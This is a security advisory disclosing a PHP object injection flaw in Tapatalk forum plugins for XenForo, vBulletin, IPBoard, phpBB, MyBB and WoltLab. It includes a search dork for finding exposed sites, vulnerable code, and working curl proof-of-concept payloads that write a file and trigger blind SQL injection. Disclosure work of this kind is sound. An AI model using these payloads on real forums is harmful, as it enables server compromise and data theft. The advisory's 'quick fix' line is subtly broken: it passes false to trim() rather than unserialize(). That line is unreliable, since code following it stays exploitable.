Advisory: Tapatalk Plugins PHP Object Injection

dH team discovered PHP Object Injection vulnerability in all Tapatalk plugins, 
which is allow to attackers execute PHP code, SQL injection or Denial of Service.
No authorization or some extra steps need, so vulnerability considered critical.

Details
=======
Vendor: https://tapatalk.com
Dork: inurl: mobiquo/mobiquo.php
Product: Tapatalk Plugin for Xenforo, vBulletin, IPBoard, PHPbb, WolfLab, MyBB
Affected versions (below):

vBulletin 3.7/8.x < 5.1.0
vBulletin 4.x.x < 5.7.7
vBulletin 5.0.x < 1.3.7
IP.Board 3.4 Series and Above < 4.5.2
IPBoard 4.0/4.1 < 1.4.2
IPBoard 4.2 or Above < 2.0.3
MyBB 1.6 / 1.8 < 4.6.7
phpBB 3.0 Series < 5.0.3
phpBB 3.1/3.2/3.3 Series < 2.1.9
Woltlab Burning Board 4.x < 1.4.2
Woltlab Burning Board 5.x < 1.5.1
XenForo 1.0.x < 3.2.7
XenForo 2.x < 1.3.0

Vulnerability Type: PHP Object Injection (https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection)
Security Risk: Critical
Vendor URL: https://tapatalk.com
Vendor Status: fixed plugins versions released, can be download at https://www.tapatalk.com/tapatalk_mobile


Introduction
============

"Building Great Communities
Tapatalk is the mobile-first community platform trusted by hundreds of thousands communities worldwide. 
Start a new community today or connect your community with our mobile app. 
It's the infrastructure and service you need to build a great community."

(from Tapatalk's Homepage)


Details
============

Tapatalk plugin API method `push_content_check` uses insecure unserialize() function call on raw user POST `data` variable, 
which leads to PHP object injection, and possible to RCE or SQL Injection on forum server.

Example of vulnerable code (from vBulletin 4.x plugin):

------------------------------------------------------------------------
<?php
[...]
function push_content_check_func(){
    global $vbulletin, $db;
    $code = trim($_POST['code']);
    $format = isset($_POST['format']) ? trim($_POST['format']) : '';
//>>>>>> HERE UNSAFE UNSERIALIZE() OCCURS <<<<<<<
    $data = unserialize(trim($_POST['data']));

    $result = array( 'result' => false );
    try {
        $connection = new classTTConnection();
        $response = $connection->actionVerification($code, 'push_content_check');
        if ($response !== true){
            $result['result_text'] = $response;
            echo ($format == 'json') ? json_encode($result) : serialize($result);
            exit;
        }
//>>>>>>>>>> AND HERE WE ALSO CAN USE DESERIALIZED OBJECT CLASSES WITH MAGIC METHOD offsetExists() FOR ARRAYABLE OBJECTS VIA isset($data['key']) <<<<<<<<<<
        if(!isset($vbulletin->options['push_key']) || !isset($data['key']) || $vbulletin->options['push_key'] != $data['key']){
            $result['result_text'] = 'incorrect api key';
            echo ($format == 'json') ? json_encode($result) : serialize($result);
            exit;
        }
[...]

------------------------------------------------------------------------


Proof of Concept
================

For Xenforo 2.x:

curl https://forum.site/mobiquo/mobiquo.php -d 'code=31337&method_name=push_content_check&data=a%3A1%3A%7Bs%3A4%3A%22type%22%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFiA1%3A%7Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A11%3A%22%2Ftmp%2Fhacked%22%3B%7D%7D'

Creates empty file `/tmp/hacked` on forum server

For vBulletin 4.x

curl https://forum.site/mobiquo/mobiquo.php -d 'code=31337&method_name=push_content_check&data=O%3A25%3A%22vB_Collection_ContentType%22%3A6%3A%7Bs%3A11%3A%22%00%2A%00cachable%22%3Bb%3A0%3Bs%3A12%3A%22%00%2A%00important%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00query_info%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1%3B%7Ds%3A16%3A%22%00%2A%00required_info%22%3Bi%3A1%3Bs%3A14%3A%22%00%2A%00loaded_info%22%3Bi%3A0%3Bs%3A9%3A%22%00%2A%00itemid%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%220%29+OR+sleep%281%22%3B%7D%7D'

The result is Blind SQL Injection (SLEEP(1) command executed on MySQL Server)

Workaround
==========

The PHP function `unserialize()` shouldn't be used with raw user input.
For PHP > 7.x exists second function argument (from PHP documentation):

"allowed_classes (mixed)
Either an array of class names which should be accepted, false to accept no classes, or true to accept all classes. 
If this option is defined and unserialize() encounters an object of a class that isn't to be accepted, 
then the object will be instantiated as __PHP_Incomplete_Class instead. 
Omitting this option is the same as defining it as true: PHP will attempt to instantiate objects of any class."

`$data = unserialize(trim($_POST['data'], false));` for example code above will be the quick fix.


Fix
===

Update the Tapatalk plugin to it's latest version.


Timeline
========

2021-07-29 Vulnerability identified
2021-07-29 Vendor notified via https://tapatalk.com/security.php
2021-08-09 Vendor notified again, received reply from vendor
2021-08-26 Updated plugins released by vendor
2021-09-02 Updated plugins released by vendor
2021-10-05 Advisory released

Credits
=======

dH team